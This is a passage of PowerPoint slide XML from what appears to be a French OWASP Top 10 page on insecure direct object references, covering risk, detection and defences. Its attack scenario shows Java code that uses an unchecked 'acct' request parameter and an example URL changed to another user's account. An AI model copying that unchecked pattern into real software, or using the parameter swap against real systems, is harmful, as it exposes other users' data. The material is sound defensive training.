                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> l’application</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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91641">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considérez les différents types d’utilisateurs de votre système. Certains d’entre eux ont-ils un accès limité aux données en fonction de leur nature ?</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fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>L'attaquant, un utilisateur légitime, substitue la valeur d'un paramètre faisant référence à un objet, par une référence à un autre objet qui lui est interdit. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aura-t-il accès à cette ressource ?</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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Les applications incluent souvent les identifiants techniques des objets au sein des pages générées (nom, clé, etc.).</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>La vérification des autorisations de l'utilisateur avant accès</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> aux objets </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>n’est pas systématique. On parle dans ce cas de références directes non sécurisées. Il est facile de détecter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> cette</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> vulnérabilité en modifiant la valeur des paramètres lors de tests. L’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>analyse rapide du code peut aussi démontrer l’absence de vérification.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Toutes les données référencées par le paramètre vulnérable sont concernées. Sauf si des références non prédictibles sont utilisées, il est facile pour l'attaquant d'accéder à toutes les</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ressources.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fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considérez</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> la valeur marchande des données exposées. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considérez également l’impact lié à la divulgation de la vulnérabilité  au grand public.</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fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemple de scénario d’attaque</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’application utilise une valeur non vérifiée dans une requête SQL accédant à des informations d’un compte :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  String query = "SELECT * FROM accts WHERE account = ?";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  PreparedStatement pstmt =</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  connection.prepareStatement(query , … );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  pstmt.setString( 1, request.getParameter("acct"));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ResultSet results = pstmt.executeQuery( );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’attaquant modifie le paramètre « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>acct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> » dans son navigateur afin d’envoyer le numéro de compte qu’il souhaite. Si le paramètre n’est pas correctement vérifié, l’attaquant peut accéder à n’importe quel compte, au lieu d’être limité au sien.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/app/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accountInfo?acct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>notmyacct</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRP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fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suis-je vulnérable ?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="300" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Le meilleur moyen de déterminer si une application est vulnérable aux références directes non sécurisées est de vérifier que toutes les références vers un objet disposent des défenses adaptées. Pour cela :</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pour les références </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>directes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> à des ressources </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protégées</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, l’application échoue-t-elle à vérifier que l’utilisateur est bien autorisé à accéder à la ressource demandée ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pour les références </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>indirectes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,  l’association vers la référence directe s’étend-elle au-delà des seules valeurs autorisées à l’utilisateur en question ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’analyse du code applicatif permet de rapidement vérifier que l’une ou l’autre des techniques est bien employée. La réalisation de tests est également efficace pour identifier les références directes et  évaluer leur sécurité. Les outils automatisés ne cherchent pas à identifier de telles vulnérabilités puisqu’ils sont incapables de reconnaître ce qui requiert une protection, ni même ce qui est sécurisé ou non.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRP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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">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4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">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5"/>
              </a:rPr>
              <a:t>OWASP Top 10-2007 on Insecure Dir Object References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">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6"/>
              </a:rPr>
              <a:t>ESAPI Access Reference Map API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">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7"/>
              </a:rPr>
              <a:t>ESAPI Access Control API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>voir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>isAuthorizedForData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(), isAuthorizedForFile(), isAuthorizedForFunction() )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pour une liste de contrôles additionnels, consultez le guide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>ASVS requirements area for Access Control (V4)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Externes</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">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0"/>
              </a:rPr>
              <a:t>CWE Entry 639 on Insecure Direct Object References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">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1"/>
              </a:rPr>
              <a:t>CWE Entry 22 on Path Traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(qui est un exemple d’attaque sur des références directes non sécurisées)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Comment protéger l’application ?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Afin d’éviter les références directes non sécurisées il convient de suivre une approche permettant de protéger chaque objet mis à disposition des utilisateurs (ex : nom de fichier, etc.) :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Implémenter des références indirectes, par utilisateur ou par session.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Cela empêche l’attaquant de cibler les ressources interdites. Par exemple, au lieu d’utiliser la clé de l’objet en base de données, une liste déroulante de six objets autorisés pour l’utilisateur pourrait s’appuyer sur les chiffres 1 à 6 pour indiquer la valeur choisie. L’application doit associer la référence indirecte par utilisateur à la valeur réelle de la clé sur le serveur. La librairie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de l’OWASP propose des méthodes facilitant l’implémentation des références indirectes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Contrôler l’accès</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Chaque sollicitation d’une référence directe par une entité non fiable doit inclure un contrôle d’accès permettant de s’assurer que l’utilisateur en question est bien autorisé à accéder à l’objet demandé.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" spc="0" dirty="0"/>
              <a:t>Références directes non sécurisées à un objet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>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A4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="208622" y="1014596"/>
            <a:ext cx="6476506" cy="585604"/>
            <a:chOff x="208622" y="1014596"/>
            <a:chExt cx="6476506" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="208622" y="1014596"/>
              <a:ext cx="6476506" cy="585604"/>
              <a:chOff x="208622" y="997424"/>
              <a:chExt cx="6476506" cy="58560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fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
